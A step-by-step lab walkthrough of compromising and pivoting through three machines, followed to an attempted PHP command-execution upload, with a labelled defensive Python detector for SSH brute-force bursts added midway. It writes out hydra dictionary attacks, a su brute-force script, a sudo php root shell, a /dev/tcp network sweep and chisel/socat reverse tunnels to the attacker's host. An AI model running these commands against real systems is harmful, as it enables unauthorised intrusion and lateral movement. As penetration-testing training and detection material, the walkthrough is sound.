-
I start by scanning for open ports
nmap -p- -vvv -sS --min-rate 5000 -Pn 10.10.10.2 -oG scan

-
I run a service and version scan against the open ports found (22 and 80)
nmap -p22,80 -sCV 10.10.10.2 -oN ports

-
We browse to the website

-
We check the technologies being used by the web application

-
We fuzz the web server to try to find directories
gobuster dir -u http://10.10.10.2/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt

-
I access the website http://10.10.10.2/shop/

-
It seems that the web page has a parameter through which I can try to load a local file (LFI)

-
With an absolute path nothing loads. When trying relative paths I managed to load files

-
I discovered two users, seller and manchi. I launch a brute force attack to try to connect via ssh as one of these users
-
With the user seller I could not obtain the password, but with manchi I could
hydra -l manchi -P /usr/share/wordlist/rockyou.txt ssh://10.10.10.2

-
I connect via ssh and, after searching for a while for ways to escalate privileges, I find nothing. I try to brute force the password of the user seller with Sudo_BruteForce
Sudo_BruteForce
./Linux-Su-Force.sh seller rockyou.txt

-
I connect as seller and list the commands I can run with sudo without providing a password

-
I search GTFOBins for a way to escalate privileges via sudo php and become root
GTFOBins
CMD="/bin/sh"
sudo php -r "system('$CMD');"

-
I find out which IPs this machine has with ‘hostname -I’. I then run a reconnaissance sweep to see which other hosts are on the 20.20.20.0/24 network
#!/bin/bash
# Host and port sweep without nmap: bash's /dev/tcp pseudo-device opens a TCP connection
for i in $(seq 1 254); do
for port in 21 22 80 443 445 8080; do
# 1 second timeout per probe; every probe runs in the background and wait collects them at the end
timeout 1 bash -c "echo '' > /dev/tcp/20.20.20.$i/$port" &>/dev/null && echo "[+] Host 20.20.20.$i - PORT $port - OPEN" &
done
done; wait

-
I create a tunnel between the two machines using chisel
# Run this on the attacking machine (10.10.10.1): chisel server accepting reverse tunnels
./chisel server --reverse -p 1234
# Run this on the compromised 10.10.10.2 machine: exposes a SOCKS proxy on the attacker's port 1080
./chisel client 10.10.10.1:1234 R:1080:socks


-
Since 20.20.20.3 has a web service on port 80, we enumerate it through the SOCKS proxy and find a secret.php file.
gobuster dir -u http://20.20.20.3/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --proxy socks5://127.0.0.1:1080 -t 5 -x .php,.txt

-
We access the page through the proxy and see a potential user


-
We run a brute force attack to try to connect via ssh as that user
proxychains4 hydra -l mario -P /usr/share/wordlist/rockyou.txt ssh://20.20.20.3 2>/dev/null
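From the defender's side, both hydra runs in this walkthrough (against manchi on 10.10.10.2 and against mario on 20.20.20.3) leave a dense burst of sshd "Failed password" records in the target's auth log. The Python detector below is an added example, not part of the original walkthrough; the log lines are constructed, and the threshold and window values are assumptions rather than values from the page.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed auth.log excerpt (not captured from the lab hosts): five failures within
# seconds from one source, then a success; plus unrelated, benign activity from another.
SAMPLE_AUTH_LOG = """\
Mar  3 10:15:01 shop sshd[2101]: Failed password for manchi from 10.10.10.1 port 50211 ssh2
Mar  3 10:15:01 shop sshd[2103]: Failed password for manchi from 10.10.10.1 port 50212 ssh2
Mar  3 10:15:02 shop sshd[2105]: Failed password for invalid user seller from 10.10.10.1 port 50213 ssh2
Mar  3 10:15:02 shop sshd[2107]: Failed password for manchi from 10.10.10.1 port 50214 ssh2
Mar  3 10:15:03 shop sshd[2109]: Failed password for manchi from 10.10.10.1 port 50215 ssh2
Mar  3 10:15:04 shop sshd[2111]: Accepted password for manchi from 10.10.10.1 port 50216 ssh2
Mar  3 10:20:00 shop sshd[2200]: Failed password for admin from 192.168.1.50 port 40000 ssh2
Mar  3 10:30:00 shop sshd[2300]: Accepted publickey for admin from 192.168.1.50 port 40001 ssh2
"""

# sshd's "Failed|Accepted <method> for [invalid user] <user> from <ip> port <n>" records.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) \w+ for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def parse_events(log_text, year=2024):
    """Return (timestamp, result, user, ip) per sshd auth record; other lines are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:  # syslog timestamps carry no year, so the caller supplies one
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["result"], m["user"], m["ip"]))
    return events

def detect_bruteforce(events, threshold=5, window_seconds=60):
    """Flag each source IP with >= threshold failures inside a window_seconds span and
    record whether that source authenticated successfully after the burst."""
    failures, successes = defaultdict(list), defaultdict(list)
    for ts, result, user, ip in sorted(events):
        (failures if result == "Failed" else successes)[ip].append((ts, user))
    alerts = {}
    for ip, fails in failures.items():
        for i in range(len(fails) - threshold + 1):
            first, last = fails[i][0], fails[i + threshold - 1][0]
            if (last - first).total_seconds() <= window_seconds:  # burst found
                alerts[ip] = {"failures": len(fails), "users": sorted({u for _, u in fails}),
                              "success_after_burst": any(t > last for t, _ in successes[ip])}
                break  # one alert per source is enough
    return alerts
```

A "success_after_burst" alert is the case worth paging on: the dictionary attack worked and the account should be treated as compromised, as happened to manchi and mario here.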

-
I connect via ssh and check which commands I can run with sudo without providing a password

-
I search GTFOBins for a way to escalate privileges via sudo vim and become root

-
I find out which IPs this machine has with ‘hostname -I’. I then run a reconnaissance sweep to see which other hosts are on the 30.30.30.0/24 network

-
I chain the tunnel through the three machines using chisel and socat
# Run this on 20.20.20.3: connect to the chisel server through the socat relay on the first pivot
./chisel client 20.20.20.2:4237 R:8888:socks
# Run this on the first pivot (20.20.20.2): relay port 4237 to the chisel server on the attacking machine; start it before the client above
./socat TCP-LISTEN:4237,fork TCP:10.10.10.1:1234


-
I scan the 5000 most common ports and find port 80 open.
nmap -sT -Pn --top-ports 5000 --open --min-rate 5000 -vvv -n 30.30.30.3 2>/dev/null

-
I try to upload a PHP file with which I can execute commands (RCE)

